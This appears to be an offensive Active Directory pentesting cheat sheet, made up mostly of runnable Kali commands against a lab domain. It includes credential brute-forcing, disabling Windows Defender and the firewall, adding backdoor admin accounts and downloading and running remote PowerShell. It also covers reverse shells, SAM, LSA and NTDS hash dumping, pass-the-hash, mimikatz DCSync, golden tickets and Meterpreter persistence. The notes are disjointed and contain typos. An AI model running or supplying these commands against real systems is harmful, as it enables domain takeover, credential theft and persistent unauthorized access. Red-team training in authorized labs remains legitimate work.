Active Directory Pentesting With Kali Linux - Red Team

https://rootsecdev.medium.com/forest-a-walk-through-in-hacking-active-directory-c83ecb21e1a9

Download it here:

https://github.com/dirkjanm/ldapdomaindump

enum4linux -u ippsec -p Password12345 -a 192.168.1.50

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.1.50 -Pn

nmap -p 88 --script=krb5-enum-users --script krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' 192.168.1.50 -Pn

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetADUsers.py

python3 GetADUsers.py -all -dc-ip 192.168.1.50 pentesting.local/ippsec

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/findDelegation.py

python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec

python3 GetUserSPNs.py -dc-ip 192.168.1.50 pentesting.local/ippsec

https://github.com/byt3bl33d3r/CrackMapExec

Bruteforcing examples

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

Enumerate shares and access

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares

Enumerate active sessions

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --sessions

Enumerate disks

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --disks

Enumerate logged on users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users

Enumerate domain users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users

python3 crackmapexec.py smb 192.168.1.50 -u 'ippsec' -p 'Password12345' --users

Enumerate users by bruteforcing RID

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute

Enumerate domain groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups

Enumerate local groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups

Obtain domain password policy

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'ipconfig'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Invoke-WebRequest -Uri "http://192.168.1.223:8000/users.txt" -OutFile "c:UsersippsecDesktopuser.txt"'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir c:UsersippsecDesktop'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type c:UsersippsecDesktopuser.txt'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user /add admin Password12345'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user'

#Add to Administrator Group

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators admin /add'

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators'

crackmapexec 192.168.215.138 -u admin -p Password12345  --local-auth

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1

mv Invoke-PowerShellTcpOneLine.ps1 invoke.ps1

nc -lvp 1234

crackmapexec wirm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'

SAM is short for the Security Account Manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the Windows boots up. SAM is found in C:WindowsSystem32config and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY_LOCAL_MACHINESAM.

crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --sam

ls ~/.cme/logs/

ls ~/.cme/logs/

sudo crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --lsa

#Where the dumps are stored

ls ~/.cme/logs/

cracking with John

john --format=NT hash

john --format=NT hash --show

john --format=NT  --wordlist=/home/user/Desktop/rockyou.txt hash

crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'

#against the domain controller, too

crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'

#Dump the entire NTLM --ntds database

sudo crackmapexec smb 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da --ntds

pth-winexe -U pentesting/

pth-winexe

apt-get update

apt-get install freerdp-x11

xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54

crackmapexec smb -L

crackmapexec smb -M mimikatz --options

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345 --server-port 81

saved here

ls /root/.cme/logs/

#start the database

cmedb

help

proto smb

help

creds

sudo crackmapexec smb 192.168.1.50 -id 2

sudo crackmapexec smb 192.168.1.50 -id 3

Install Java:

echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list

sudo apt-get update

Install Neo4j

1. Add the neo4j repo to your apt sources:

wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -

echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list

sudo apt-get update

2. Install apt-transport-https with apt

apt-get install apt-transport-https

  3. Install neo4j community edition using apt:

sudo apt-get install neo4j

  4. Stop neo4j

systemctl stop neo4j

  5. Start neo4j

cd /usr/bin

./neo4j console or systemctl start neo4j

Open a web browser and navigate to https://localhost:7474/.

You should see the neo4j web console.

6. Authenticate to neo4j in the web console with username neo4j, password neo4j.

7. You’ll be prompted to change this password.

Download the BloodHound GUI

1. Download the latest version of the BloodHound GUI from

2. https://github.com/BloodHoundAD/BloodHound/releases

3. Unzip the folder, then run BloodHound with the –no-sandbox flag:

./BloodHound.bin --no-sandbox

https://bloodhound.readthedocs.io/en/latest/installation/linux.html

sudo msfconsole

use exploit/multi/handler

set LHOST 192.168.1.223 <-- local Machine

set LPORT 470

python3 -m http.server

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'

AMSI

AntiMalware Scan Interface

Windows AMSI is integrated into the following components:

    PowerShell (scripts, interactive use, and dynamic code evaluation)

    PowerShell ISE (Windows PowerShell-IDE)

    Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)

    User Account Control (UAC) (using a different type of AMSI-provider)

    Office365 (JavaScript/VBA)

    Office365 (Documents)

    .Net Framework 4.8 (Scanning for all assemblies)

    Windows Management Instrumentation (WMI)

upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.

• usage: upload local_path remote_path

download: it is not needed to set local_path if the remote file is in the current directory.

• usage: download remote_path local_path

services: list all services. No administrator permissions needed.

iex(new-object net.webclient).downloadstring(http://192.168.1.223:8000/PowerView.ps1')

Dll-Loader -http -path http://192.168.1.223:8000/SharpSploit.dll

menu

[SharpSploit.

[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()

[SharpSploit.Enumeration.Net]::GetNetLocalGroups()

[SharpSploit.Enumeration.Net]::GetNetLoggedOnUsers()

[SharpSploit.Enumeration.Net]::GetNetSessions()

[SharpSploit.Enumeration.Net]::GetNetShares()

User Enumeration

Get current username

echo %USERNAME% || whoami

$env:username

List user privilege

whoami /priv

whoami /groups

List all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator

net user admin

net user %USERNAME%

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

Network Enumeration

List all network interfaces, IP, and DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -A

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firewall state and current configuration

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List firewall's blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

SNMP Configuration

reg query HKLMSYSTEMCurrentControlSetServicesSNMP /s

Get-ChildItem -path HKLM:SYSTEMCurrentControlSetServicesSNMP -Recurse

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

https://github.com/BC-SECURITY/Empire

sudo apt install powershell-empire

sudo powershell-empire

https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/

Listeners

help

uselistener http

info <-  it will display all the options that you can tweak

BindIP to Kali’s IP address

Port to any port number other than 80

execute

https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit

net user raba Password123 /add

net localgroup administrators raba /add

net localgroup "Remote Management Users" raba /add

remove old

evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50

upload /tmp/launcher.bat C:UsersjenkinsadminDocumentslauncher.bat

C:UsersjenkinsadminDocumentslauncher.bat

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Check if it is exploitable:

use exploit/windows/smb/ms17_010_psexec

set rhosts 192.168.1.53

set smbpass Password123

set smbuser student1

set smbdomain pentesting.local

set paylod windows/meterpreter/reverse_tcp

run

/

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

use Auxiliary/gather/Kerberos_enumusers

sysinfo

ps

post/windows/gather/enum_ad_users

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_logged_on_users

post/windows/gather/enum_ad_user_comments

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_domain

post/windows/gather/enum_computers

post/windows/gather/resolve_sid.rb

run post/windows/gather/enum_ad_computers.rb

post/windows/gather/local_admin_search_enum

post/windows/gather/enum_ad_service_principal_names

run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

ipconfig

netstat

route

#Windows Gather Enumerate Domain Admin Tokens (T

post/windows/gather/enum_tokens

post/windows/gather/enum_patches

post/windows/gather/credentials/winscp

#Windows Gather Powershell Environment Setting E

post/windows/gather/enum_powershell_env

post/windows/gather/enum_ie

post/windows/gather/bloodhound

for More

search post/windows/gather/

use post/windows/gather/enum_shares

use post/windows/gather/enum_services

use post/windows/gather/enum_snmp

use post/windows/gather/enum_chrome

use post/windows/gather/enum_av_excluded

use post/windows/gather/enum_putty_saved_sessions

use post/windows/gather/enum_applications

use post/windows/gather/win_privs

use post/windows/gather/forensics/browser_history

for more:

search post/windows/gather/

LOCAL_EXPLOIT_SUGGESTER

run post/multi/recon/local_exploit_suggester

post/windows/gather/win_privs

post/windows/manage/add_user

set addtogroup true

set username test

set group administrators

set session 2

post/windows/manage/delete_user

search hashdump

search credential_collector

post/windows/gather/hashdump

post/windows/gather/credentials/credential_collector

meterpreter > load kiwi

meterpreter > help

Testing Credentials

crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!

https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

• use exploit/windows/smb/psexec

  • set SMBDomain pentesting.local

  • set smbuser ippsec

  • set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe

  • set rhosts 192.168.1.55

  • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

• use exploit/windows/smb/psexec

  • set SMBDomain pentesting.local

  • set smbuser s4vitar

  • set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71

  • set rhosts 192.168.1.50

  • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

use post/windows/gather/credentials/domain_hashdump

scanner/smb/impacket/secretsdump

In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.

use post/windows/gather/credentials/domain_hashdump

use incognito

list_tokens -u

impersonate_token PENTESTING\Administrator

From Domain Controller

meterpreter > use incognito

meterpreter > impersonate_token PENTESTING\Administrator

meterpreter > load kiwi

meterpreter > help

meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'

meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'

use post/windows/escalate/golden_ticket

Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.

The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.

With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).

Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.

kerberos_ticket_list

kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin

After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.

meterpreter > run persistence -h

meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223

meterpreter > exit

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.223

set LPORT 4458

exploit

When a user logs in to the remote system, a Meterpreter session is opened up for us.

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.

In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.

One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).